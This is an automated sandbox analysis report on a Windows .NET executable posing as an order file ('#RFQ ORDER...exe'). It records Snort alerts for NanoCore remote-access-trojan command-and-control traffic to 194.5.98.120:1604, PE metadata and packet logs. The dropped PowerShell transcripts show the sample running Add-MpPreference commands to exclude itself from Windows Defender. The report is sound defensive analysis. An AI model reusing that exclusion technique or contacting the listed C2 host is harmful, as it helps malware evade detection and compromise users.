                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210720081403..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe..Process ID: 6052..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210720081404..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe..**********************..Command start time: 20210720081716..**********************..PS>TerminatingError(Add-MpPreference): "A positional paramet
                      C:\Users\user\Documents\20210720\PowerShell_transcript.226546.u9dWU6FT.20210720081341.txt
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5793
                      Entropy (8bit):5.412847263408266
                      Encrypted:false
                      SSDEEP:96:BZNh/NVqDo1ZLZjh/NVqDo1ZDv1HjZAh/NVqDo1ZSaXXpZS:n
                      MD5:94A5AE9AD0D8454A4EF076656F8CD28C
                      SHA1:121D585258DF4F2E7F6014EDAE62E7B3DBAB28D2
                      SHA-256:D772214C85FA0304F10BAE0A6EF2E121D0E178FBCF5D1D5E7E365121C1E0D09C
                      SHA-512:540E05271914407E668505658AD2690CA34F146E9488493285559508DFDB7AF27E7CB157DCFEBD5033C5E1DE25490ED4661BDF40856D6F959AE320DB336A8946
                      Malicious:false
                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210720081343..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe..Process ID: 1848..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210720081343..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe..**********************..Windows PowerShell transcript start..Start time: 20210720081837..Username: computer\user..RunAs User: computer\ha
                      C:\Users\user\Documents\20210720\PowerShell_transcript.226546.xFvC9uuU.20210720081339.txt
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5793
                      Entropy (8bit):5.408644517030285
                      Encrypted:false
                      SSDEEP:96:BZoh/NhqDo1ZGZlSh/NhqDo1Z6v1HjZYh/NhqDo1ZWaXXhZ+:b7
                      MD5:B31D920EEB8EE60422F11E5502682C2D
                      SHA1:462C3BC549115DD38E47A26E1C7CEC05E57C46DF
                      SHA-256:EBDDFEE32AC4653F7D04B6ECA36895358930EE4540BDD228B033CA1C5D582449
                      SHA-512:B12784998A80E148D9AA731596F68A2D3075766695473419D6157AF313D7C545B4EBA20E35D17A4134EDA0A64C1D55C49FD62B005472EC1C98ACB7738B0718B9
                      Malicious:false
                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210720081405..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe..Process ID: 2416..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210720081405..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe..**********************..Windows PowerShell transcript start..Start time: 20210720082127..Username: computer\user..RunAs User: computer\ha

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.60637440768652
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:#RFQ ORDER7678432213211.exe
                      File size:1084928
                      MD5:2f286cd817b368e8a747e8f0d8f28825
                      SHA1:e49beec02d942e12b0dad74d81ab8ed4f02667e2
                      SHA256:b291d719522053a662cadd70b131668a1d953d4c4dd648e8a5647b689eb6341d
                      SHA512:3347116d44099808d4bbc050bc45c6b207adc8c75e2bcfdfc49d3d535328c9ddeebc0ded194b0c99e2f4ef021e1cfca221f6f09eef7fa77322e103671a4009cc
                      SSDEEP:24576:JU3ej57dEAKrvDBhGw4S3hYA0abY7VZ6Iyvv9JQ0NGNPV:ZALX3x0TrS7V

                      File Icon

                      Icon Hash:00828e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x50a426
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x920335CE [Sat Aug 17 19:45:18 2047 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:v4.0.30319
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al

                      Data Directories

                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10a3d4 | 0x4f | .text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10c000 | 0x3d0 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10e000 | 0xc | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x10a3b8 | 0x1c | .text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                      Sections

                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x2000 | 0x10842c | 0x108600 | False | 0.76640070922 | data | 7.61140570465 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rsrc | 0x10c000 | 0x3d0 | 0x400 | False | 0.38671875 | data | 3.0404823065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc | 0x10e000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      Name | RVA | Size | Type | Language | Country
                      RT_VERSION | 0x10c058 | 0x374 | data | |

                      Imports

                      DLL | Import
                      mscoree.dll | _CorExeMain

                      Version Infos

                      Description | Data
                      Translation | 0x0000 0x04b0
                      LegalCopyright | Copyright 2019
                      Assembly Version | 1.0.0.0
                      InternalName | SafeTypeNameParserHand.exe
                      FileVersion | 1.0.0.0
                      CompanyName |
                      LegalTrademarks |
                      Comments |
                      ProductName | ControlVehicular
                      ProductVersion | 1.0.0.0
                      FileDescription | ControlVehicular
                      OriginalFilename | SafeTypeNameParserHand.exe

                      Network Behavior

                      Snort IDS Alerts

                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                      07/20/21-08:13:47.111506 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49726 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:13:54.987776 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49729 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:14:01.086640 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49730 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:14:08.165157 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49731 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:14:15.206346 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49735 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:14:22.219133 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49737 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:14:29.166940 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49738 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:14:35.243747 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49739 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:14:41.426450 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49740 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:14:48.432412 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49742 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:14:54.599567 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49744 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:15:01.610024 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49745 | 1604 | 192.168.2.3 | 194.5.98.120
                      07/20/21-08:15:07.891700 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49746 | 1604 | 192.168.2.3 | 194.5.98.120

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 20, 2021 08:14:02.937345982 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.937472105 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.946805000 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.946887016 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.967571020 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.972047091 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.977423906 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.977513075 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:02.997502089 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:02.999906063 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.376781940 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.376967907 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.404556036 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.416754007 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.419950008 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.436793089 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.437411070 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.456885099 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.457020998 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.476850033 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.479254007 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.498061895 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.498558998 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.506839037 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.507006884 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.517138958 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.518496037 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.527152061 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.527282000 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.807990074 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.842463017 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.917412996 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.917650938 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.936991930 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.937195063 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.957494020 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.957596064 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.979510069 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.979567051 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:03.986865044 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:03.987045050 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:04.007478952 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:04.007622957 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:04.017139912 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:04.017245054 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:04.027070999 CEST160449730194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:04.027165890 CEST497301604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:07.890778065 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:08.164105892 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:08.164516926 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:08.165157080 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:08.434273958 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:08.435486078 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:08.714288950 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:08.764091969 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:08.838645935 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.134315968 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.136713982 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.224410057 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.227979898 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.266733885 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.266860008 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.296672106 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.296839952 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.316678047 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.318439960 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.436537981 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.496799946 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.526757956 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.531821012 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.556778908 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.576818943 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.576934099 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.596725941 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.616688013 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.616767883 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.626830101 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.646707058 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.646806002 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.786704063 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.842396975 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.949486971 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:09.966731071 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:09.967792988 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.016807079 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.018440962 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.046695948 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.048666954 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.066837072 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.067136049 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.106694937 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.106822014 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.126662016 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.126795053 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.137065887 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.137140036 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.146887064 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.147041082 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.156974077 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.157100916 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.166855097 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.166975021 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.176996946 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.177027941 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.177154064 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.186974049 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.187140942 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.197118044 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.197284937 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.207223892 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.207252026 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.207319021 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.207345963 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.217072010 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.217156887 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.226744890 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.226900101 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.287069082 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.287169933 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.296828985 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.296925068 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.307173967 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.307275057 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.317091942 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.317132950 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.317311049 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.326695919 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.326828957 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.356965065 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.362811089 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.387728930 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.387814999 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.396544933 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.396709919 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.456857920 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.466892958 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.466978073 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.476766109 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.496790886 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.496891975 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.536875010 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.546964884 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.547132015 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.556901932 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.566848993 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.566931963 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.576759100 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.616914034 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.617055893 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.636892080 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:10.686145067 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:10.906126022 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.006922007 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.006993055 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.026654005 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.026726961 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.046847105 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.046925068 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.066687107 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.066771030 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.076714039 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.076911926 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.096719027 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.096790075 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.107002974 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.107186079 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.117135048 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.117280960 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.127254963 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.127459049 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.137389898 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.137871027 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:11.148149014 CEST160449731194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:11.148391008 CEST497311604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:14.922468901 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:15.205452919 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:15.205622911 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:15.206346035 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:15.495383978 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:15.498665094 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:15.765425920 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:15.767327070 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.105571032 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.105700016 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.295380116 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.295552969 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.337956905 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.339226007 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.367948055 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.369259119 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.387872934 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.387964010 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.417756081 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.608050108 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.657882929 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.657983065 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.687927961 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.713705063 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.713969946 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.757829905 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.777935028 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.780025005 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.797969103 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.807885885 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.808253050 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.906244040 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.948482037 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.948671103 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.968044043 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:16.969096899 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:16.998040915 CEST160449735194.5.98.120192.168.2.3
                      Jul 20, 2021 08:14:17.000701904 CEST497351604192.168.2.3194.5.98.120
                      Jul 20, 2021 08:14:17.008119106 CEST160449735194.5.98.120192.168.2.3
